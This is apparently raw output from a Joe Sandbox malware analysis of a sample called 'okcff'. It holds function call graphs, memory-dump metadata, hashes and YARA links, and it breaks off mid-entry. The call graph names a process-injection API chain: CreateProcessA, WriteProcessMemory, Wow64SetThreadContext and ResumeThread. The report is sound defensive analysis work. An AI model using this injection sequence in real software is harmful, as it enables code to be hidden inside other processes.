2161d3a 41581->41582 41586 21ab30a K32EnumProcessModules 41581->41586 41587 21ab310 K32EnumProcessModules 41581->41587 41582->41476 41583->41580 41584 21a8d00 CreateProcessA 41583->41584 41585 21a8cf4 CreateProcessA 41583->41585 41584->41580 41585->41580 41586->41582 41587->41582 41588->41581 41589->41581 41590->41581 41591->41581 41593 216221f 41592->41593 41637 21a8aa8 41593->41637 41641 21a8aa0 41593->41641 41594 216227b 41598 21a92d4 ReadProcessMemory 41597->41598 41600 21a934c 41598->41600 41600->41504 41602 21a92d4 ReadProcessMemory 41601->41602 41604 21a934c 41602->41604 41604->41504 41606 21a8d87 CreateProcessA 41605->41606 41608 21a8fdc 41606->41608 41610 21a8d00 CreateProcessA 41609->41610 41612 21a8fdc 41610->41612 41614 21aa550 K32EnumProcesses 41613->41614 41616 21aa622 41614->41616 41616->41508 41618 21a9dc4 41617->41618 41619 21aa5c6 K32EnumProcesses 41618->41619 41621 21a9e93 41618->41621 41620 21aa622 41619->41620 41620->41508 41621->41508 41623 21a7e85 41622->41623 41624 21a7ec2 41623->41624 41625 21aa5c6 K32EnumProcesses 41623->41625 41624->41508 41626 21aa622 41625->41626 41626->41508 41628 21a7e68 K32EnumProcesses 41627->41628 41630 21aa622 41628->41630 41630->41508 41632 21ab35d K32EnumProcessModules 41631->41632 41633 21ab3c8 41632->41633 41633->41509 41635 21ab35d K32EnumProcessModules 41634->41635 41636 21ab3c8 41635->41636 41636->41509 41638 21a8af4 WriteProcessMemory 41637->41638 41640 21a8b8d 41638->41640 41640->41594 41642 21a8af4 WriteProcessMemory 41641->41642 41644 21a8b8d 41642->41644 41644->41594 41721 21ab430 41724 21ab496 K32GetModuleBaseNameA 41721->41724 41723 21ab5b1 41724->41723 41725 21a86f0 41726 21a8734 ResumeThread 41725->41726 41728 21a8780 41726->41728 41732 21a8860 41733 21a88a9 Wow64SetThreadContext 41732->41733 41735 21a8921 41733->41735 41729 3d3710 41730 3d3758 ShowWindow 41729->41730 41731 3d37ae 41730->41731

                                                            Executed Functions

                                                            Function 0218A8D0, Relevance: 5.5, Strings: 4, Instructions: 500COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 218a8d0-218a8f8 2 218a8fa-218a941 0->2 3 218a946-218a954 0->3 35 218ade0-218ade7 2->35 4 218a963 3->4 5 218a956-218a961 call 2188260 3->5 7 218a965-218a974 4->7 5->7 12 218a97a-218a986 7->12 13 218aa63-218aa6f 7->13 17 218ade8-218ae12 12->17 18 218a98c-218a990 12->18 20 218aabd-218aac7 13->20 21 218aa71-218aa80 call 2186460 13->21 28 218ae1a-218ae44 17->28 22 218a9a2-218a9fe call 2187f38 call 2188a48 18->22 23 218a992-218a99c 18->23 24 218ab09-218ab2f 20->24 25 218aac9-218aae1 call 2185c80 20->25 37 218aa84-218aa89 21->37 65 218aa04-218aa5e 22->65 66 218aea5-218aecd 22->66 23->22 23->28 46 218ab3c 24->46 47 218ab31-218ab3a 24->47 50 218ae4c-218ae5f 25->50 51 218aae7-218ab04 25->51 28->50 38 218aa8b-218aab8 call 218a398 37->38 39 218aa82 37->39 38->35 39->37 54 218ab3e-218ab69 46->54 47->54 69 218ae66-218ae9e 50->69 51->35 70 218ac4f-218ac53 54->70 71 218ab6f-218ab9c 54->71 65->35 73 218aecf-218aed5 66->73 74 218aed7-218aedd 66->74 69->66 75 218acd8-218ace2 70->75 76 218ac59-218ac72 70->76 71->70 83 218aba2-218abb1 call 2185c18 71->83 73->74 79 218aede-218af1b 73->79 81 218ad48-218ad51 75->81 82 218ace4-218acee 75->82 76->75 105 218ac74-218ac83 call 2185c18 76->105 84 218ad89-218add6 81->84 85 218ad53-218ad81 call 2187720 call 2187740 81->85 93 218acf0-218acf2 82->93 94 218acf4-218ad06 82->94 100 218abc9-218abde 83->100 101 218abb3-218abb9 83->101 106 218adde 84->106 85->84 99 218ad08-218ad13 93->99 94->99 125 218ad41-218ad46 99->125 126 218ad15-218ad19 99->126 111 218ac10-218ac1c 100->111 112 218abe0-218ac0a call 2186950 100->112 108 218abbb 101->108 109 218abbd-218abbf 101->109 122 218ac9b-218aca9 105->122 123 218ac85-218ac8b 105->123 106->35 108->100 109->100 111->66 116 218ac22-218ac49 111->116 112->69 112->111 116->70 116->83 122->66 132 218acaf-218acd6 122->132 129 218ac8d 123->129 130 218ac8f-218ac91 123->130 125->81 125->82 133 218ad1b-218ad34 126->133 134 218ad37-218ad3c call 21845c0 126->134 129->122 130->122 132->75 132->105 133->134 134->125
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll$.@ll$>Kll$fCll
                                                            • API String ID: 0-1454501470
                                                            • Opcode ID: a6eac37855d3cc4314c2501eaf5489126bb29b904443757ef3f681e1ed245951
                                                            • Instruction ID: 6fe4abdecaa9e6ebc277bad3f367ff6e35085c47885e6cb95ef3ac05d11f1382
                                                            • Opcode Fuzzy Hash: a6eac37855d3cc4314c2501eaf5489126bb29b904443757ef3f681e1ed245951
                                                            • Instruction Fuzzy Hash: DD129D31A402149FCB18EFA4C484AAEB7F6FF88314B158569E906EB355DB35EC52CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542B370, Relevance: 4.0, Strings: 3, Instructions: 291COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 237 542b370-542b3ac 241 542b3b8-542b3bf call 542b218 237->241 242 542b3ae-542b3b5 237->242 245 542b3c1-542b3c8 241->245 246 542b3cb-542b43c 241->246 250 542b4d0-542b510 246->250 251 542b3ea-542b3f4 246->251 265 542b512-542b520 250->265 266 542b521 call 542b218 250->266 251->250 252 542b3fa-542b404 251->252 252->250 253 542b40a-542b414 252->253 253->250 255 542b41a-542b44b 253->255 273 542b49f-542b4a3 255->273 270 542b526-542b528 266->270 271 542b52a-542b538 270->271 272 542b539-542b5a4 270->272 284 542b644-542b663 272->284 285 542b558-542b562 272->285 274 542b4a5 273->274 275 542b44d-542b462 273->275 277 542b4a7-542b4a9 274->277 275->250 276 542b464-542b490 275->276 276->250 279 542b492-542b49c 276->279 277->250 280 542b4ab-542b4b5 277->280 279->273 280->277 283 542b4b7-542b4cd 280->283 289 542b665-542b672 284->289 290 542b66f 284->290 285->284 286 542b568-542b572 285->286 286->284 288 542b578-542b582 286->288 288->284 291 542b588-542b5b6 288->291 290->289 302 542b60a-542b60e 291->302 303 542b610 302->303 304 542b5b8-542b5d3 302->304 306 542b612-542b614 303->306 304->284 305 542b5d5-542b5fa 304->305 305->284 307 542b5fc-542b607 305->307 306->284 308 542b616-542b620 306->308 307->302 308->306 309 542b622-542b643 308->309
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $.@ll$.@ll
                                                            • API String ID: 0-1918450220
                                                            • Opcode ID: f2aa957a54ac5d13684ebc4e0f0bff4140c0606357a63ad672cbdf142d294c54
                                                            • Instruction ID: 9aa40e0e6563aba9e48ccb15ed0aa4135f6e49176ad83ba74cc50622be7a268e
                                                            • Opcode Fuzzy Hash: f2aa957a54ac5d13684ebc4e0f0bff4140c0606357a63ad672cbdf142d294c54
                                                            • Instruction Fuzzy Hash: 8691E131B081358FCB10CB6998804FEBB73EBC5218BA9C5BBC516DB746D631E8578792
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542A12A, Relevance: 2.7, Strings: 2, Instructions: 197COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 883 542a12a-542a282 902 542a284-542a2dd 883->902 903 542a2df-542a2ed 883->903 906 542a2f8-542a33c 902->906 903->906 924 542a33f call 542aec0 906->924 925 542a33f call 542aeba 906->925 911 542a345-542a3ae 915 542a3ba-542a3bc 911->915 916 542a3e6-542a402 915->916 917 542a3be-542a3e4 915->917 920 542a410 916->920 921 542a404 916->921 917->916 923 542a411 920->923 921->920 923->923 924->911 925->911
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Djo$mo
                                                            • API String ID: 0-3939666776
                                                            • Opcode ID: 3b914cba42f3f7bfb8eea0905ab8677724aa708d20f8588ef9912563ffc10aaa
                                                            • Instruction ID: 8c1564d433aa39890acefe96fc9d9e846cff77f3209ff736688432a906aa0634
                                                            • Opcode Fuzzy Hash: 3b914cba42f3f7bfb8eea0905ab8677724aa708d20f8588ef9912563ffc10aaa
                                                            • Instruction Fuzzy Hash: 07719A39E111358BDB04CB7AD8586BDB3B3BF88345B55D529E806FB394CB30A9468F90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542A0E3, Relevance: 2.7, Strings: 2, Instructions: 197COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 839 542a0e3-542a0e6 840 542a0e8 839->840 841 542a149-542a282 839->841 840->841 859 542a284-542a2dd 841->859 860 542a2df-542a2ed 841->860 863 542a2f8-542a33c 859->863 860->863 881 542a33f call 542aec0 863->881 882 542a33f call 542aeba 863->882 868 542a345-542a3ae 872 542a3ba-542a3bc 868->872 873 542a3e6-542a402 872->873 874 542a3be-542a3e4 872->874 877 542a410 873->877 878 542a404 873->878 874->873 880 542a411 877->880 878->877 880->880 881->868 882->868
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Djo$mo
                                                            • API String ID: 0-3939666776
                                                            • Opcode ID: 136161478daa2f5ba7887f10153293543bf2626549232407091448c409867fcb
                                                            • Instruction ID: 550a8e331eaf3d045c091617f4fbfb7b35ded70d0a68bda93f15130c763ab38e
                                                            • Opcode Fuzzy Hash: 136161478daa2f5ba7887f10153293543bf2626549232407091448c409867fcb
                                                            • Instruction Fuzzy Hash: 20718739A111258FDB04CB7AD858ABDB3B3BF88345B54D529E806FB354CB30A9468F90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02184B98, Relevance: 2.4, Strings: 1, Instructions: 1198COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4
                                                            • API String ID: 0-4088798008
                                                            • Opcode ID: 5a46f8411a16ffa0a5edc2a0815535364095ffba26dde8c917bddf958279408f
                                                            • Instruction ID: 751ce929f09f11e3d2500cd53709061b9c4e7d0a844150b3707e191202d0fa91
                                                            • Opcode Fuzzy Hash: 5a46f8411a16ffa0a5edc2a0815535364095ffba26dde8c917bddf958279408f
                                                            • Instruction Fuzzy Hash: D5B20834A40218DFDB14DFA8C984BADB7B6EF88304F5681A5E906AB364DB34DD85CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021AC43D, Relevance: 2.1, APIs: 1, Instructions: 575COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnumChildWindows.USER32(?,?,?), ref: 021AC8AF
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumWindows
                                                            • String ID:
                                                            • API String ID: 3555792229-0
                                                            • Opcode ID: 2da05fbe138f8b05720fbc692e08ff8ec12bd61ede901c1822e73c5e66846bd2
                                                            • Instruction ID: 310a1e269422c39818ce2a64fb3e40f381b762fca3f108c39a4cd70d5342239c
                                                            • Opcode Fuzzy Hash: 2da05fbe138f8b05720fbc692e08ff8ec12bd61ede901c1822e73c5e66846bd2
                                                            • Instruction Fuzzy Hash: F5411EB4D052889FCB10CFA8E580AEEFFB0BF4A310F24906AE444B7251C7389A45CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0218D148, Relevance: 2.0, Strings: 1, Instructions: 713COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll
                                                            • API String ID: 0-3231272322
                                                            • Opcode ID: d4a22f8f371ea693f7f4c61edcc8847b6821dda35fbb1ddd8173e79246622daa
                                                            • Instruction ID: 8a3028bc8845f44f8f78b9fb7980b92998138b08b6e3282799f1c5e9ee505c31
                                                            • Opcode Fuzzy Hash: d4a22f8f371ea693f7f4c61edcc8847b6821dda35fbb1ddd8173e79246622daa
                                                            • Instruction Fuzzy Hash: 14620575A012289FDB64DF68C980BADB7F6AF88310F1540E9E549AB391DB30DE91CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02184EC8, Relevance: 1.8, Strings: 1, Instructions: 507COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4
                                                            • API String ID: 0-4088798008
                                                            • Opcode ID: 7b629a693fe726059cdabd3b1765e3fa00311439dd500fc9bbbcb206673287b4
                                                            • Instruction ID: 01be07b45be324666bc78f6217878369dae1084299aa950fa50da1a038be6bf1
                                                            • Opcode Fuzzy Hash: 7b629a693fe726059cdabd3b1765e3fa00311439dd500fc9bbbcb206673287b4
                                                            • Instruction Fuzzy Hash: 8C320634A40214DFDB24EF64C984BADB7B2FF48304F5684A9D90AAB264DB31ED85CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021AC348, Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 041284c7211833070d9c4a717b2daa730a9f84d29ec2ca09b243bbcf57cea405
                                                            • Instruction ID: 5f5d9980d03ba0683e64833065646fb07380dd7a9c03082f85feeabf85de688d
                                                            • Opcode Fuzzy Hash: 041284c7211833070d9c4a717b2daa730a9f84d29ec2ca09b243bbcf57cea405
                                                            • Instruction Fuzzy Hash: 95519C78E49248DFCB04CFA8D460AAEBBF1EF4A310F1580ABE515AB351C7349845CB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021A4AB0, Relevance: .8, Instructions: 842COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 670d38e3dacd46167465af400e36d3c369aa55ebcd374f698cc5b8a107be2d88
                                                            • Instruction ID: 92643c38e46131f0cc3835f6702d8bf670fe0b50782570a649baa70622e318ca
                                                            • Opcode Fuzzy Hash: 670d38e3dacd46167465af400e36d3c369aa55ebcd374f698cc5b8a107be2d88
                                                            • Instruction Fuzzy Hash: B462BB34B047119FCB25CF68C4A06AEFBF2BF89304F148929D55A9B780DB74E906CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02187F38, Relevance: .7, Instructions: 689COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c1525d940c86d0d7aa8e8d1929ba2000a68618db17ddc10254e61232005763b6
                                                            • Instruction ID: 1fc7260ba53e57bb2d2e741d31b575cdd45cf2e563bef0c0c3bb05501904ab05
                                                            • Opcode Fuzzy Hash: c1525d940c86d0d7aa8e8d1929ba2000a68618db17ddc10254e61232005763b6
                                                            • Instruction Fuzzy Hash: 60424934B402088FDB14EF39C994A6A77F6AF89344B5684A9D906CB3A5DF31EC42CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0218778F, Relevance: .6, Instructions: 550COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 32f4cb2fd3c31ac221670aefa0600de3f8741f4c30336072768b46b3f83281da
                                                            • Instruction ID: 41f2835b4f95c7f14dcc8b2880c8e4e8e3c471841a6591fd9e69eefb1a9c0ead
                                                            • Opcode Fuzzy Hash: 32f4cb2fd3c31ac221670aefa0600de3f8741f4c30336072768b46b3f83281da
                                                            • Instruction Fuzzy Hash: 41226C35A402149FDB14EF64D894AAEB7F2AF88304F158069E905DB3A1DB71ED82CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 003D2519, Relevance: .4, Instructions: 357COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.619777746.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_3d0000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 00bf84001a22a7db93764c36e5d3673bdb4edc451b9d82dc9ea72fe7ff549f32
                                                            • Instruction ID: 4a5f41eb98df1f9f081ca88ee7fca0680f5bcc03ef638fd17485dcff89eefa16
                                                            • Opcode Fuzzy Hash: 00bf84001a22a7db93764c36e5d3673bdb4edc451b9d82dc9ea72fe7ff549f32
                                                            • Instruction Fuzzy Hash: FEF1E37594A228CFDB22CF14E898BEAB7B5BB6A301F2090D6D409A7751D7709EC1DF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542AEC0, Relevance: .2, Instructions: 248COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4eb0e7fb1f6169de4c64d6749b16c4c75d6bab245930d94a00ddf37401c7272c
                                                            • Instruction ID: 83707f8dea7affdb94d8740c84ebcc366aa81899530f72705b7cf3639787a2b4
                                                            • Opcode Fuzzy Hash: 4eb0e7fb1f6169de4c64d6749b16c4c75d6bab245930d94a00ddf37401c7272c
                                                            • Instruction Fuzzy Hash: 3A918E31B241248BC714DB6AD840AAEB3B3AFC4754F5AC065E806EB759DF759C46CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02188D88, Relevance: .2, Instructions: 217COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07f2172e927f0498c2a149a32e8bff16ed81991e7ac837ddd19a1dd927d4ff61
                                                            • Instruction ID: fd4a49e5f9b36203b19972e7d021384b7014c1d69662a37d27090bb9d5eef327
                                                            • Opcode Fuzzy Hash: 07f2172e927f0498c2a149a32e8bff16ed81991e7ac837ddd19a1dd927d4ff61
                                                            • Instruction Fuzzy Hash: FF812A35A402188FCB14EF69C4849AEB7F6FF88714B1684A9E916DB361DB31ED41CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542FC98, Relevance: 5.3, Strings: 4, Instructions: 320COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 146 542fc98-542fcb5 148 542fcc3-542fcc7 146->148 149 542fcb7-542fcc0 146->149 150 542fcd5-542fcd9 148->150 151 542fcc9-542fcd2 148->151 152 542fce7-542fd01 150->152 153 542fcdb-542fce4 150->153 157 542fd1c-542fd22 152->157 158 542fcfd-542fd0a 152->158 160 542fd25-542fd3d 158->160 161 542fd0c-542fd12 158->161 164 542fdae-542fdb0 160->164 165 542fd3f-542fd45 160->165 234 542fd14 call 542fd30 161->234 235 542fd14 call 542fd81 161->235 236 542fd14 call 542fc98 161->236 163 542fd1a 163->157 166 542fdb1-542fdb9 164->166 167 542fdd9-542fe7a call 542ca28 164->167 168 542fd47-542fd4d 165->168 169 542fd4e-542fd50 165->169 166->167 170 542fdbb-542fdbf 166->170 230 542fe47 call 21102f0 167->230 231 542fe47 call 21102e0 167->231 232 542fe47 call 2110169 167->232 233 542fe47 call 2110178 167->233 171 542fd52-542fd58 169->171 172 542fd5e-542fd66 169->172 173 542fdc1-542fdc6 170->173 174 542fdc7-542fdce 170->174 175 542fd5a 171->175 176 542fd5c 171->176 182 542fd64-542fd6b 172->182 183 542fd6c-542fd72 172->183 184 542fdd0-542fdd8 174->184 185 542fdad 174->185 175->172 176->172 189 542fd74-542fd7b 183->189 190 542fd7c-542fd7f 183->190 185->164 202 542fe4d-542fe68 204 542fea6-542feda 202->204 205 542fe6a-542fea3 202->205 212 542fee0-542fef3 204->212 213 542ffae-542ffb4 204->213 205->204 214 542ff38-542ff46 212->214 214->213 215 542ff48-542ff52 214->215 217 542ff54-542ff5b 215->217 218 542fef5-542feff 215->218 221 542ff79-542ffab call 542c468 217->221 222 542ff5d-542ff77 217->222 219 542ff01-542ff19 218->219 220 542ff1b-542ff2a 218->220 219->220 226 542ff32-542ff35 220->226 222->221 226->214 230->202 231->202 232->202 233->202 234->163 235->163 236->163
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll$.@ll$Duo$Duo
                                                            • API String ID: 0-1451570219
                                                            • Opcode ID: 771d89266b88dfd0948c50093a7448e0fc5777850fbdd7eb8664002624205583
                                                            • Instruction ID: 599c595d763c3c8b00d30ee7047d8395554005f304e7a36f18a96d591c97ef7f
                                                            • Opcode Fuzzy Hash: 771d89266b88dfd0948c50093a7448e0fc5777850fbdd7eb8664002624205583
                                                            • Instruction Fuzzy Hash: C1A18035B18128AFCB11DFA8E8859FEFBB2FF88310B94856BE50A97355C7319845CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542FD81, Relevance: 3.9, Strings: 3, Instructions: 154COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 310 542fd81-542fd8d 311 542fdfe-542fe7a call 542ca28 310->311 312 542fd8f-542fda1 310->312 365 542fe47 call 21102f0 311->365 366 542fe47 call 21102e0 311->366 367 542fe47 call 2110169 311->367 368 542fe47 call 2110178 311->368 313 542fda3-542fda8 312->313 314 542fda9-542fdab 312->314 316 542fdcc-542fdce 314->316 318 542fdd0-542fdd8 316->318 319 542fdad-542fdb0 316->319 323 542fdb1-542fdb9 319->323 324 542fdd9-542fdfc 319->324 323->324 326 542fdbb-542fdbf 323->326 324->311 329 542fdc1-542fdc6 326->329 330 542fdc7-542fdca 326->330 330->316 337 542fe4d-542fe68 339 542fea6-542feda 337->339 340 542fe6a-542fea3 337->340 347 542fee0-542fef3 339->347 348 542ffae-542ffb4 339->348 340->339 349 542ff38-542ff46 347->349 349->348 350 542ff48-542ff52 349->350 352 542ff54-542ff5b 350->352 353 542fef5-542feff 350->353 356 542ff79-542ffab call 542c468 352->356 357 542ff5d-542ff77 352->357 354 542ff01-542ff19 353->354 355 542ff1b-542ff2a 353->355 354->355 361 542ff32-542ff35 355->361 357->356 361->349 365->337 366->337 367->337 368->337
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll$.@ll$Duo
                                                            • API String ID: 0-1677867494
                                                            • Opcode ID: 8e0916a58579e8c7c07afc8ae0a8014a033c1b564aaff2ec2cbf154462421f00
                                                            • Instruction ID: 9bb525e0e4a0d61389e9022378c24feaec552c500051bff05853c5ae6ee53ea8
                                                            • Opcode Fuzzy Hash: 8e0916a58579e8c7c07afc8ae0a8014a033c1b564aaff2ec2cbf154462421f00
                                                            • Instruction Fuzzy Hash: FF515E75A04124EFCB05CFA8D8858FDBBB3FF88310B94856AE416A7351DB30AC46CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542C235, Relevance: 3.8, Strings: 3, Instructions: 72COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 369 542c235-542c237 370 542c239-542c23b 369->370 371 542c23d-542c299 369->371 370->371 394 542c29b call 542c980 371->394 395 542c29b call 542c8d8 371->395 396 542c29b call 542c8e8 371->396 379 542c2a1-542c307 call 542ba64 call 542ba74 392 542c30c-542c331 379->392 394->379 395->379 396->379
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,zo$Duo$d|o
                                                            • API String ID: 0-910993238
                                                            • Opcode ID: b8941f81513ed49e95a16b6b62d4aa80779afda764bb1cdace9faaa553b6d7cb
                                                            • Instruction ID: 408fc10dd3c3d865093c9cd3ba4ce037b58cae32d3e5470677f6e89034e338ca
                                                            • Opcode Fuzzy Hash: b8941f81513ed49e95a16b6b62d4aa80779afda764bb1cdace9faaa553b6d7cb
                                                            • Instruction Fuzzy Hash: 7511933170C2246BD708BBB968946BEA697EFD4350B84843EF626CB394CF319D168761
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0211D4B0, Relevance: 2.9, Strings: 2, Instructions: 359COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
